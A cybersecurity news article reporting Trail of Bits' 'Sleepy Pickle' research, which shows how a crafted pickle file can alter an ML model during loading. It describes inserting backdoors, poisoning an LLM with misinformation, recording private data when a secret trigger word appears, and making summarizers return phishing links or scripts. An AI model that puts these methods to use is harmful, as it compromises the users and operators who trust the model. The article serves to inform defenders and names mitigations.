Tuesday, June 18, 2024

Sleepy Pickle Exploit Let Attackers Exploit ML Models And Attack End-Users

Hackers are targeting, attacking, and exploiting ML models. They want to hack into these systems to steal sensitive data, interrupt services, or manipulate outcomes in their favor.

By compromising the ML models, hackers can degrade the system performance, cause financial losses, and damage the trust and reliability of AI-driven applications.

Cybersecurity analysts at Trail of Bits recently discovered that Sleepy Pickle exploit lets threat actors to exploit the ML models and attack end-users.

Technical Analysis

Researchers unveiled Sleepy Pickle, an unknown attack exploiting the insecure Pickle format for distributing machine learning models. 

Unlike previous techniques compromising systems deploying models, Sleepy Pickle stealthily injects malicious code into the model during deserialization. 

Free Webinar on API vulnerability scanning for OWASP API Top 10 vulnerabilities -> Book Your Spot

This allows modifying model parameters to insert backdoors or control outputs and hooking model methods to tamper with processed data by compromising end-user security, safety, and privacy. 

The technique delivers a maliciously crafted pickle file containing the model and payload. When deserialized, the file executes, modifying the in-memory model before returning it to the victim.

Corrupting an ML model via a pickle file injection (Source – Trail of Bits)

Sleepy Pickle offers malicious actors a powerful foothold on ML systems by stealthily injecting payloads that dynamically tamper with models during deserialization. 

This overcomes the limitations of conventional supply chain attacks by leaving no disk traces, customizing payload triggers, and broadening the attack surface to any pickle file in the target’s supply chain. 

Unlike uploading covertly malicious models, Sleepy Pickle hides malice until runtime. 

Attacks can modify model parameters to insert backdoors or hook methods to control inputs and outputs, enabling unknown threats like generative AI assistants providing harmful advice after weight-patching poisons the model with misinformation. 

The technique’s dynamic, Leave-No-Trace nature evades static defenses.

Compromising a model to make it generate harmful outputs (Source – Trail of Bits)

The LLM models processing the sensitive data pose risks. Researchers compromised a model to steal private info during conception by injecting code recording data triggered by a secret word. 

Traditional security measures were ineffective as the attack occurred within the model.

This unknown threat vector emerging from ML systems underscores their potential for abuse beyond traditional attack surfaces.

Compromising a model to steal private user data (Source – Trail of Bits)

In addition, there are other kinds of summarizer applications, such as browser apps, that improve user experience by summarizing web pages.

Since users trust these summaries, compromising the model behind them for generating harmful summaries could be a real threat and allow an attacker to serve malicious content.

Once altered summaries with malicious links are returned to users, they may click such a link and become victims of phishing scams or malware.

Compromise model to attack users indirectly (Source – Trail of Bits)

If the app returns content with JavaScript, it is also possible that this payload will inject a malicious script.

To mitigate these attacks, one can use models from reputable organizations and choose safe file formats.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free

Website

Latest articles

Singapore Police Arrested Two Individuals Involved in Hacking Android Devices

The Singapore Police Force (SPF) has arrested two men, aged 26 and 47, for...

CISA Conducts First-Ever Tabletop Exercise Focused on AI Cyber Incident Response

On June 13, 2024, the Cybersecurity and Infrastructure Security Agency (CISA) made history by...

Europol Taken Down 13 Websites Linked to Terrorist Operations

Europol and law enforcement agencies from ten countries have taken down 13 websites linked...

New ARM ‘TIKTAG’ Attack Impacts Google Chrome, Linux Systems

Memory corruption lets attackers hijack control flow, execute code, elevate privileges, and leak data.ARM's...

Operation Celestial Force Employing Android And Windows Malware To Attack Indian Users

A Pakistani threat actor group, Cosmic Leopard, has been conducting a multi-year cyber espionage...

Hunt3r Kill3rs Group claims they Infiltrated Schneider Electric Systems in Germany

The notorious cybercriminal group Hunt3r Kill3rs has claimed responsibility for infiltrating Schneider Electric's systems...

Hackers Employing New Techniques To Attack Docker API

Attackers behind Spinning YARN launched a new cryptojacking campaign targeting publicly exposed Docker Engine...
Tushar Subhra Dutta
Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Free Webinar

API Vulnerability Scanning

71% of the internet traffic comes from APIs so APIs have become soft targets for hackers.Securing APIs is a simple workflow provided you find API specific vulnerabilities and protect them.In the upcoming webinar, join Vivek Gopalan, VP of Products at Indusface as he takes you through the fundamentals of API vulnerability scanning..
Key takeaways include:

  • Scan API endpoints for OWASP API Top 10 vulnerabilities
  • Perform API penetration testing for business logic vulnerabilities
  • Prioritize the most critical vulnerabilities with AcuRisQ
  • Workflow automation for this entire process

Related Articles